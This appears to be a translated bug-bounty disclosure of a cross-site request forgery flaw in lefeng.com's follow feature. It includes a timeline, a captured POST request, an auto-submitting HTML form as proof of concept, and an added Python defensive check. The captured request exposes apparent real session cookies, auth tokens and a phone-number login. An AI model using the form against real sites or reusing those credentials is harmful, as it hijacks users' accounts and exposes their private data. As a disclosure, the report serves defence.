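2014-12-20: Details reported to the vendor; awaiting vendor handling
2014-12-25: Vendor confirmed; details disclosed to the vendor only
2015-01-04: Details disclosed to core white hats and experts in related fields
2015-01-14: Details disclosed to regular white hats
2015-01-24: Details disclosed to intern white hats
2015-02-03: Details disclosed to the public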
http://f.lefeng.com/
The problem is in the follow feature. The uid here is the ID of the user to be followed.
POST /weibo/follow?&u=t&lg=n&uid=49679472 HTTP/1.1
Host: f.lefeng.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://f.lefeng.com/u/49679472/fans
Cookie: WT_FPC=id=200ea5b8ff7756332ec1419002557918:lv=1419047889169:ss=1419046010273:lsv=1419002557918:vs=1:spv=55; __utma=96327937.1116324794.1419003289.1419003289.1419046965.2; __utmz=96327937.1419003289.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lvm_id=90510774674712620001419002562661; __smoc=4a2dc51917e01bd50252bd4d357e5d0d; Hm_lvt_db93c73698769fe05759abb4a4b36104=1419002565; Hm_lvt_69200f796b23f8fe027c39886c7298db=1419004959,1419005845,1419046010,1419047195; __zpspc=76.1.1419002578.1419003289.8%234%7C%7C%7C%7C%7C%23; countyId=171202; __cart_count__=1; CART_COUNTTIME=1419005867957%2420; OneTimeValuesCookies=__user_type__%240%23__user_totalbuy__%240%23__user_id__%2449669146; lafaso_login_name_as988=15754334072; newGuest=%7B%22state%22%3A8%2C%22id%22%3A%224_55_2772%22%7D; pgv_pvi=8990515200; shipInfo=0; acta=%7B%22actn%22%3A%7B%22500096%22%3A%5B%226720823703263600022%3E19%3E1419003287771%3E6%3E1419003287626%3E124137555940697161%3E1419003147068%22%2C1434555289278%5D%7D%2C%22acti%22%3A%7B%22500096%22%3A%5B%22141900313659848430%22%2C1434555136598%5D%7D%2C%22acts%22%3A%7B%22500096%22%3A%5B%225%22%2C1434555150363%5D%7D%2C%22actmapping%22%3A%7B%220%22%3A%5B1%2C1421595289280%5D%7D%7D; CHANETINFO=93269564257; aid=1200; cid2=505236; cid3=93269564257; LongTimeValuesCookies=__SSO_LOGIN%249a063f830782f35ff46434e014c4b8400b2be3a23c3adcb74c49c49ec31758246b3211d855cfeff6%23__user_id_login_2009%24a4ec0050f18dd61418004458108854bb%23__LOGIN__VIEWINFO__%24157****4072%23__LOGIN%2415754334072%23__user_id__%2449669146; uid=49669146; fxb_auth=1b1caHmH22mLsPx3rvuSmLehVMa%2BWoLBqXDymY3bH2Pnw702ejnMibTFO9f8cZc%2FJ9EaqmLolFRDulrF6hYjE5J2ibmRJnf9guGvU3FNJ9gkjv08%2FB%2FV0HINo%2BQtpHsqRZxZIwuoEUZtk1OmBOcYCI2iOqZzJsNAjntjrwHDYX0fhJB8lQZEbZfuTnwNH6by%2F4gpULP2IZ8DD54; fxb_user_info=%7B%22user_id%22%3A%2249669146%22%2C%22nickname%22%3A%22%5Cu8702%5Cu53cb69146%22%2C%22status%22%3A%221%22%2C%22role%22%3A%221%22%2C%22tags%22%3A%5Bfalse%5D%7D; __utmb=96327937.1.10.1419046965; Hm_lpvt_69200f796b23f8fe027c39886c7298db=1419047195; NTKF_CACHE_DATA=%7B%22uid%22%3Anull%2C%22tid%22%3Anull%2C%22fid%22%3A%221419047196250148%22%2C%22d%22%3A%7B%7D%7D; BIGipServerpool_drb_web=gPcn/VgJSacEXLYY2UV9Brq24c3aQ6A5UlZoc/wRPVYFKd/Vg2ozZwIk2hM40aRajLerB0IHDcgbLjI=; ordercoupon=a4ec0050f18dd61418004458108854bb
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
<html><body>
<form id="demo" name="demo" action="http://f.lefeng.com/weibo/follow?&u=t&lg=n&uid=49679472" method="POST">
  <input type="submit" value="submit" />
</form>
<script> document.demo.submit();</script>
</body></html>
Severity: Low
Vulnerability Rank: 5
Confirmed: 2014-12-25 14:36
Thank you for your attention to Lefeng; we will fix this as soon as possible.
None yet
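
A server-side check that rejects the auto-submitting form shown in the report, given as an added example (not code from the original report or from the vendor). The allowed-origin list, the secret, the session identifier and attacker.example are assumptions; the token is an HMAC-SHA256 over the session identifier.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumptions, not from the report: trusted origins, secret and session id.
ALLOWED_ORIGINS = {"http://f.lefeng.com"}
SERVER_SECRET = b"constructed-demo-secret"  # placeholder; load from config
SESSION = "constructed-session-id"          # constructed sample value


def issue_csrf_token(session_id):
    """Per-session token the site embeds in its own pages."""
    mac = hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256)
    return mac.hexdigest()


def request_origin(headers):
    """Origin header if present, else scheme://host taken from Referer."""
    if headers.get("Origin"):
        return headers["Origin"]
    parts = urlsplit(headers.get("Referer", ""))
    if parts.scheme and parts.netloc:
        return f"{parts.scheme}://{parts.netloc}"
    return None


def allow_state_change(method, headers, session_id, token):
    """Return (allowed, reason) for a request such as POST /weibo/follow."""
    if method != "POST":
        return False, "state change must use POST"
    origin = request_origin(headers)
    if origin not in ALLOWED_ORIGINS:
        return False, f"untrusted origin: {origin}"
    expected = issue_csrf_token(session_id)
    if not token or not hmac.compare_digest(expected, token):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed requests: a same-site call (used with and without a token; the
# captured request carries cookies only) and a cross-site form post.
SAME_SITE = {"Referer": "http://f.lefeng.com/u/49679472/fans"}
CROSS_SITE = {"Origin": "http://attacker.example"}

if __name__ == "__main__":
    good = issue_csrf_token(SESSION)
    print(allow_state_change("POST", SAME_SITE, SESSION, good))
    print(allow_state_change("POST", SAME_SITE, SESSION, None))
    print(allow_state_change("POST", CROSS_SITE, SESSION, good))
```

A request that carries only cookies, as the captured follow request does, fails the token check even when its Referer is same-site.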